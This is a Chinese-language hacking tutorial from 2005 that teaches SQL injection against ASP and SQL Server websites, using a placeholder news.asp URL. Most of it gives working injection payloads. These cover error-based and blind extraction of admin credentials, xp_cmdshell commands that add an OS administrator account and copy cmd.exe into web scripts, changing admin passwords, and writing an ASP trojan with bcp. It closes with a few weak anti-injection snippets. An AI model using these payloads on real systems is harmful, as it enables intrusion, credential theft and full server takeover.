| 發表日期:2005-2-13 星期日<一>sql注入簡介
許多網站程序在編寫時,沒有對用戶輸入數據的合法性進行判斷,使應用程序存在安全隱患。用戶可以提交一段數據庫查詢代碼,(一般是在瀏覽器地址欄進行,通過正常的www端口訪問)根據程序返回的結果,獲得某些他想得知的數據,這就是所謂的sql injection,即sql注入。
<二>sql注入思路
思路最重要。其實好多人都不知道sql到底能做什么呢?這里總結一下sql注入入侵的總體的思路:
1. sql注入漏洞的判斷,即尋找注入點
2. 判斷后臺數據庫類型
3. 確定xp_cmdshell可執行情況;若當前連接數據的帳號具有sa權限,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行,則整個計算機可以通過幾種方法完全控制,也就完成了整個注入過程,否則繼續:
1. 發現web虛擬目錄
2. 上傳asp木馬;
3. 得到管理員權限
具體步驟:
一、sql注入漏洞的判斷
如果以前沒玩過注入,請把ie菜單-工具-internet選項-高級-顯示友好http錯誤信息前面的勾去掉。
為了把問題說明清楚,以下以http://www.163.com/news.asp?id=xx(這個地址是假想的),為例進行分析,xx可能是整型,也有可能是字符串。
1、整型參數的判斷
當輸入的參數xx為整型時,通常news.asp中sql語句原貌大致如下:
select * from 表名 where 字段=xx,所以可以用以下步驟測試sql注入是否存在。
最簡單的判斷方法
http://www.163.com/news.asp?id=xx’(附加一個單引號),
此時news.asp中的sql語句變成了
select * from 表名 where 字段=xx’,
如果程序沒有過濾好“’”的話,就會提示 news.asp運行異常;但這樣的方法雖然很簡單,但并不是最好的,因為:
first,不一定每臺服務器的iis都返回具體錯誤提示給客戶端,如果程序中加了cint(參數)之類語句的話,sql注入是不會成功的,但服務器同樣會報錯,具體提示信息為處理 url 時服務器上出錯。請和系統管理員聯絡。
second,目前大多數程序員已經將“’“ 過濾掉,所以用” ’”測試不到注入點,所以一般使用經典的1=1和1=2測試方法,見下文:
http://www.163.com/news.asp?id=xx and 1=1, news.asp運行正常,
而且與http://www.163.com/news.asp?id=xx運行結果相同;
http://www.163.com/news.asp?id=xx and 1=2, news.asp運行異常;(這就是經典的 1=1 1=2 判斷方法)
如果以上面滿足,news.asp中就會存在sql注入漏洞,反之則可能不能注入。
2、字符串型參數的判斷
方法與數值型參數判斷方法基本相同
當輸入的參數xx為字符串時,通常news.asp中sql語句原貌大致如下:
select * from 表名 where 字段='xx',所以可以用以下步驟測試sql注入是否存在。
http://www.163.com/news.asp?id=xx’(附加一個單引號),此時news.asp中的sql語句變成了
select * from 表名 where 字段=xx’,news.asp運行異常;
http://www.163.com/news.asp?id=xx and '1'='1', news.asp運行正常,
而且與http://www.163.com/news.asp?id=xx運行結果相同;
http://www.163.com/news.asp?id=xx and '1'='2', news.asp運行異常;
如果以上滿足,則news.asp存在sql注入漏洞,反之則不能注入
3、特殊情況的處理
有時asp程序員會在程序員過濾掉單引號等字符,以防止sql注入。此時可以用以下幾種方法試一試。
①大小定混合法:由于vbs并不區分大小寫,而程序員在過濾時通常要么全部過濾大寫字符串,要么全部過濾小寫字符串,而大小寫混合往往會被忽視。如用select代替select,select等;
②unicode法:在iis中,以unicode字符集實現國際化,我們完全可以ie中輸入的字符串化成unicode字符串進行輸入。如+ =%2b,空格=%20 等;urlencode信息參見附件一;
③ascii碼法:可以把輸入的部分或全部字符全部
<4>出了上述方法以外,還有個更簡單的方法就是使用現成的工具像nb聯盟的nbsi就是一款很不錯的工具,目前最新的版本為2.2
二、判斷數據庫類型
不同的數據庫的函數、注入方法都是有差異的,所以在注入之前,我們還要判斷一下數據庫的類型。一般asp最常搭配的數據庫是access和sqlserver,網上超過99%的網站都是其中之一。
怎么讓程序告訴你它使用的什么數據庫呢?來看看:
sqlserver有一些系統變量,如果服務器iis提示沒關閉,并且sqlserver返回錯誤提示的話,那可以直接從出錯信息獲取,方法如下:
http://www.163.com/news.asp?id=xx;and user>0
這句語句很簡單,但卻包含了sqlserver特有注入方法的精髓,我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義:首先,前面的語句是正常的,重點在and user>0,我們知道,user是sqlserver的一個內置變量,它的值是當前連接的用戶名,類型為nvarchar。拿一個 nvarchar的值跟int的數0比較,系統會先試圖將nvarchar的值轉成int型,當然,轉的過程中肯定會出錯,sqlserver的出錯提示是:將nvarchar值 ”abc” 轉換數據類型為 int 的列時發生語法錯誤,呵呵,abc正是變量user的值,這樣,不廢吹灰之力就拿到了數據庫的用戶名。在以后的篇幅里,大家會看到很多用這種方法的語句。 順便說幾句,眾所周知,sqlserver的用戶sa是個等同adminstrators權限的角色,拿到了sa權限,幾乎肯定可以拿到主機的 administrator了。上面的方法可以很方便的測試出是否是用sa登錄,要注意的是:如果是sa登錄,提示是將”dbo”轉換成int的列發生錯誤,而不是”sa”。
如果服務器iis不允許返回錯誤提示,那怎么判斷數據庫類型呢?我們可以從access和sqlserver和區別入手,access和 sqlserver都有自己的系統表,比如存放數據庫中所有對象的表,access是在系統表[msysobjects]中,但在web環境下讀該表會提示“沒有權限”,sqlserver是在表[sysobjects]中,在web環境下可正常讀取。
在確認可以注入的情況下,使用下面的語句:
http://www.163.com/news.asp?id=xx ;and (select count(*) from sysobjects)>0
http://www.163.com/news.asp?id=xx ;and (select count(*) from msysobjects)>0
如果數據庫是sqlserver,那么第一個網址的頁面與原頁面http://www.163.com/news.asp?id=xx是大致相同的;而第二個網址,由于找不到表msysobjects,會提示出錯,就算程序有容錯處理,頁面也與原頁面完全不同。
如果數據庫用的是access,那么情況就有所不同,第一個網址的頁面與原頁面完全不同;第二個網址,則視乎數據庫設置是否允許讀該系統表,一般來說是不允許的,所以與原網址也是完全不同。大多數情況下,用第一個網址就可以得知系統所用的數據庫類型,第二個網址只作為開啟iis錯誤提示時的驗證。
三、確定xp_cmdshell可執行情況
若當前連接數據的帳號具有sa權限,且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行,則整個計算機可以通過以下幾種方法完全控制,以后的所有步驟都可以省
1、http://www.163.com/news.asp?id=xx and user>;0 news.asp執行異常但可以得到當前連接數據庫的用戶名(若顯示dbo則代表sa)。
2、http://www.163.com/news.asp?id=xx and db_name()>0 news.asp執行異常但可以得到當前連接的數據庫名。
3、http://www.163.com/news.asp?id=xx;exec master..xp_cmdshell “net user aaa bbb /add”-- (master是sql-server的主數據
庫;名中的分號表示sql-server執行完分號前的語句名,繼續執行其后面的語句;“—”號是注解,表示其后面的所有內容僅為注釋,系統并不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。
4、http://www.163.com/news.asp?id=xx;exec master..xp_cmdshell “net localgroup administrators aaa /add”-- 把剛剛增加
的帳戶aaa加到administrators組中。
5、http://www.163.com/news.asp?id=xx;backuup database 數據庫名 to disk='c:/inetpub/wwwroot/save.db' 則把得到的數據內容
全部備份到web目錄下,再用http把此文件下載(當然首選要知道web虛擬目錄)。
6、通過復制cmd創建unicode漏洞
http://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell “copy c:/winnt/system32/cmd.exe
c:/inetpub/scripts/cmd.exe” 便制造了一個unicode漏洞,通過此漏洞的利用方法,便完成了對整個計算機的控制(當然首選要知道web虛擬目錄)。
這樣你就成功的完成了一次sql注入攻擊,先別興奮,在實踐時你就會發現這比理論要難的多會有更多的困難等著你come over ,下面go on如果上述條件不成立則需繼續奮斗(要掛馬了:))
go on~!
當上述條件不成立時就要繼續下面的步驟
(一)、發現web虛擬目錄
只有找到web虛擬目錄,才能確定放置asp木馬的位置,進而得到user權限。有兩種方法比較有效。
一是根據經驗猜解,一般來說,web虛擬目錄是:c:/inetpub/wwwroot;
d:/inetpub/wwwroot; e:/inetpub/wwwroot等,而可執行虛擬目錄是:
c:/inetpub/scripts; d:/inetpub/scripts; e:/inetpub/scripts等。
二是遍歷系統的目錄結構,分析結果并發現web虛擬目錄;
先創建一個臨時表:temp
http://www.163.com/news.asp?id=xx;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3
nvarchar(255));--
接下來:
1 我們可以利用xp_availablemedia來獲得當前所有驅動器,并存入temp表中:
http://www.163.com/news.asp?id=xx;insert temp exec master.dbo.xp_availablemedia;--
我們可以通過查詢temp的內容來獲得驅動器列表及相關信息
2 我們可以利用xp_subdirs獲得子目錄列表,并存入temp表中:
http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_subdirs 'c:/';--
3 我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,并寸入temp表中:
http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';--
這樣就可以成功的瀏覽到所有的目錄(文件夾)列表:
如果我們需要查看某個文件的內容,可以通過執行xp_cmdsell:
http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';--
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如:bulk insert temp(id) from 'c:/inetpub/wwwroot/index.asp'
瀏覽temp就可以看到index.asp文件的內容了!通過分析各種asp文件,可以得到大量系統信息,web建設與管理信息,甚至可以得到sa帳號的連接密碼。
當然,如果xp_cmshell能夠執行,我們可以用它來完成:
http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/';--
http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/ *.asp /s/a';--
通過xp_cmdshell我們可以看到所有想看到的,包括w3svc
http://www.163.com/news.asp?id=xx;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript
c:/inetpub/adminscripts/adsutil.vbs enum w3svc'
但是,如果不是sa權限,我們還可以使用
http://www.163.com/news.asp?id=xx;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';--
注意:
1、以上每完成一項瀏覽后,應刪除temp中的所有內容,刪除方法是:
http://www.163.com/news.asp?id=xx;delete from temp;--
2、瀏覽temp表的方法是:(假設testdb是當前連接的數據庫名)
http://www.163.com/news.asp?id=xx and (select top 1 id from testdb.dbo.temp )>0
得到表temp中第一條記錄id字段的值,并與整數進行比較,顯然news.asp工作異常,但在異常中卻可以發現id字段的值。假設發現的表名是xyz,則
http://www.163.com/news.asp?id=xx and (select top 1 id from testdb.dbo.temp )>0 where id not in('xyz'))>0
得到表temp中第二條記錄id字段的值。
(二)、上傳asp木馬
所謂asp木馬,就是一段有特殊功能的asp代碼,并放入web虛擬目錄的scripts下,遠程客戶通過ie就可執行它,進而得到系統的user權限,實現對系統的初步控制。上傳asp木馬一般有兩種比較有效的方法:
1、利用web的遠程管理功能
許多web站點,為了維護的方便,都提供了遠程管理的功能;也有不少web站點,其內容是對于不同的用戶有不同的訪問權限。為了達到對用戶權限的控制,都有一個網頁,要求用戶名與密碼,只有輸入了正確的值,才能進行下一步的操作,可以實現對web的管理,如上傳、下載文件,目錄瀏覽、修改配置等。
因此,若獲取正確的用戶名與密碼,不僅可以上傳asp木馬,有時甚至能夠直接得到user權限而瀏覽系統,上一步的“發現web虛擬目錄”的復雜操作都可省略。
用戶名及密碼一般存放在一張表中,發現這張表并讀取其中內容便解決了問題。以下給出兩種有效方法。
a、 注入法:
從理論上說,認證網頁中會有型如:
select * from admin where username='xxx' and password='yyy' 的語句,若在正式運行此句之前,沒有進行必要的字符過濾,則很容易實施sql注入。
如在用戶名文本框內輸入:abc’ or 1=1-- 在密碼框內輸入:123 則sql語句變成:
select * from admin where username='abc’ or 1=1 and password='123’
不管用戶輸入任何用戶名與密碼,此語句永遠都能正確執行,用戶輕易騙過系統,獲取合法身份。
b、猜解法:
基本思路是:猜解所有數據庫名稱,猜出庫中的每張表名,分析可能是存放用戶名與密碼的表名,猜出表中的每個字段名,猜出表中的每條記錄內容。
a 猜解所有數據庫名稱
http://www.163.com/news.asp?id=xx and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0
因為dbid的值從1到5,是系統用了。所以用戶自己建的一定是從6開始的。并且我們提交了 name>1 (name字段是一個字符型的字段和數字比較會出錯),news.asp工作異常,可得到第一個數據庫名,同理把dbid分別改成7,8,9,10,11,12…就可得到所有數據庫名。
以下假設得到的數據庫名是testdb。
b 猜解數據庫中用戶名表的名稱
猜解法:此方法就是根據個人的經驗猜表名,一般來說,
user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,
systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。并通過語句進行判斷
http://www.163.com/news.asp?id=xx and (select count(*) from testdb.dbo.表名)>0 若表名存在,則news.asp工作正常,否則異常。如此循環,直到猜到系統帳號表的名稱。
讀取法:sql-server有一個存放系統核心信息的表sysobjects,有關一個庫的所有表,視圖等信息全部存放在此表中,而且此表可以通過web進行訪問。
當xtype='u' and status>0代表是用戶建立的表,發現并分析每一個用戶建立的表及名稱,便可以得到用戶名表的名稱,基本的實現方法是:
①http://www.163.com/news.asp?id=xx and (select top 1 name from testdb.dbo.sysobjects where xtype='u' and status>0 )>0
得到第一個用戶建立表的名稱,并與整數進行比較,顯然news.asp工作異常,但在異常中卻可以發現表的名稱。假設發現的表名是xyz,則
②http://www.163.com/news.asp?id=xx and (select top 1 name from testdb.dbo.sysobjects where xtype='u' and status>0 and
name not in('xyz'))>0 可以得到第二個用戶建立的表的名稱,同理就可得到所有用建立的表的名稱。
根據表的名稱,一般可以認定那張表用戶存放用戶名及密碼,以下假設此表名為admin。
c 猜解用戶名字段及密碼字段名稱
admin表中一定有一個用戶名字段,也一定有一個密碼字段,只有得到此兩個字段的名稱,才有可能得到此兩字段的內容。如何得到它們的名稱呢,同樣有以下兩種方法。
猜解法:此方法就是根據個人的經驗猜字段名,一般來說,用戶名字段的名稱常用:username,name,user,account等。而密碼字段的名稱常用:password,pass,pwd,passwd等。并通過語句進行判斷
http://www.163.com/news.asp?id=xx and (select count(字段名) from testdb.dbo.admin)>0 “select count(字段名) from 表名”
語句得到表的行數,所以若字段名存在,則news.asp工作正常,否則異常。如此循環,直到猜到兩個字段的名稱。
讀取法:基本的實現方法是
http://www.163.com/news.asp?id=xx and (select top 1 col_name(object_id('admin'),1) from testdb.dbo.sysobjects)>0 。
select top 1 col_name(object_id('admin'),1) from testdb.dbo.sysobjects是從sysobjects得到已知表名的第一個字段名,當與整數進行比較,顯然news.asp工作異常,但在異常中卻可以發現字段的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5,6…就可得到所有的字段名稱。
d 猜解用戶名與密碼
猜用戶名與密碼的內容最常用也是最有效的方法有:
ascii碼逐字解碼法:雖然這種方法速度較慢,但肯定是可行的。基本的思路是先猜出字段的長度,然后依次猜出每一位的值。猜用戶名與猜密碼的方法相同,以下以猜用戶名為例說明其過程。
http://www.163.com/news.asp?id=xx and (select top 1 len(username) from testdb.dbo.admin)=x(x=1,2,3,4,5,… n,username
為用戶名字段的名稱,admin為表的名稱),若x為某一值i且news.asp運行正常時,則i就是第一個用戶名的長度。如:當輸入
http://www.163.com/news.asp?id=xx and (select top 1 len(username) from testdb.dbo.admin)=8時news.asp運行正常,則第一個用戶名的長度為8
http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,m,1)) from testdb.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間,當m=1,2,3,…時猜測分別猜測第1,2,3,…位的值;n的值是1~9、a~z、a~z的ascii值,也就是1~128之間的任意值;admin為系統用戶帳號表的名稱),若n為某一值i且news.asp運行正常時,則i對應ascii碼就是用戶名某一位值。如:當輸入
http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,3,1)) from testdb.dbo.admin)=80時news.asp運行正常,則用戶名的第三位為p(p的ascii為80);http://www.163.com/news.asp?id=xx and (select top 1 ascii(substring(username,9,1)) from testdb.dbo.admin)=33時news.asp運行正常,則用戶名的第9位為!(!的ascii為80);猜到第一個用戶名及密碼后,同理,可以猜出其他所有用戶名與密碼。注意:有時得到的密碼可能是經md5等方式加密后的信息,還需要用專用工具進行脫密。或者先改其密碼,使用完后再改回來,見下面說明。簡單法:猜用戶名用http://www.163.com/news.asp?id=xx and (select top 1 flag from testdb.dbo.admin where username>1) , flag是admin表中的一個字段,username是用戶名字段,此時news.asp工作異常,但能得到username的值。與上同樣的方法,可以得到第二用戶名,第三個用戶等等,直到表中的所有用戶名。
猜用戶密碼:http://www.163.com/news.asp?id=xx and (select top 1 flag from testdb.dbo.admin where pwd>1) , flag是admin表中的一個字段,pwd是密碼字段,此時news.asp工作異常,但能得到pwd的值。與上同樣的方法,可以得到第二用戶名的密碼,第三個用戶的密碼等等,直到表中的所有用戶的密碼。密碼有時是經md5加密的,可以改密碼。
http://www.163.com/news.asp?id=xx;update testdb.dbo.admin set pwd=' a0b923820dcc509a' where username='www';-- ( 1的md5值為:aaabbbcccdddeeef,即把密碼改成1;www為已知的用戶名)用同樣的方法當然可把密碼改原來的值。
2、利用表內容導成文件功能
sql有bcp命令,它可以把表的內容導成文本文件并放到指定位置。利用這項功能,我們可以先建一張臨時表,然后在表中一行一行地輸入一個asp木馬,然后用bcp命令導出形成asp文件。
命令行格式如下:
bcp "select * from text..foo" queryout c:/inetpub/wwwroot/163.asp –c –s localhost –u sa –p foobar
('s'參數為執行查詢的服務器,'u'參數為用戶名,'p'參數為密碼,最終上傳了一個163.asp的木馬)
3、利用工具,如nbsi給出的一些參考數據最重要的表名:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
最重要的一些用戶名(默認sql數據庫中存在著的)
public
dbo
guest(一般禁止,或者沒權限)
db_sercurityadmin
ab_dlladmin
一些默認擴展
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia 驅動器相關
xp_dirtree 目錄
xp_enumdsn odbc連接
xp_loginconfig 模式信息
xp_makecab 創建壓縮卷
xp_ntsec_enumdomains domain信息
xp_terminate_process 終端進程,給出一個pid
(三)、得到系統的管理員權限
asp木馬只有user權限,要想獲取對系統的完全控制,還要有系統的管理員權限。怎么辦?提升權限的方法有很多種:
上傳木馬,修改開機自動運行的.ini文件(它一重啟,便死定了);
復制cmd.exe到scripts,人為制造unicode漏洞;
下載sam文件,破解并獲取os的所有用戶名密碼;
等等,視系統的具體情況而定,可以采取不同的方法。
那么我們怎么防注入呢?程序如下加入到asp或html或php或cgi里面都可以。經過測試。加入如 top.asp文件中開頭
方法一:
<%if session("username"="" or session("userkey"="" then
response.redirect "../../"
end if%>
(說明:只要有用戶注入則跳轉到../../目錄,呵呵,看你怎么給我注入)
方法二:
<%
server_v1=cstr(request.servervariables("http_referer")
server_v2=cstr(request.servervariables("server_name")
if mid(server_v1,8,len(server_v2))<>server_v2 then
response.write "<br><br><center><table border=1 cellpadding=20 bordercolor=black bgcolor=#eeeeee width=450>"
response.write "<tr><td style=“font:9pt verdana">"
response.write "你提交的路徑有誤,禁止從站點外部提交數據請不要亂該參數!"
response.write "</td></tr></table></center>"
response.end
end if
%>
(說明:只要有用戶注入則判斷為外部
新聞熱點
疑難解答
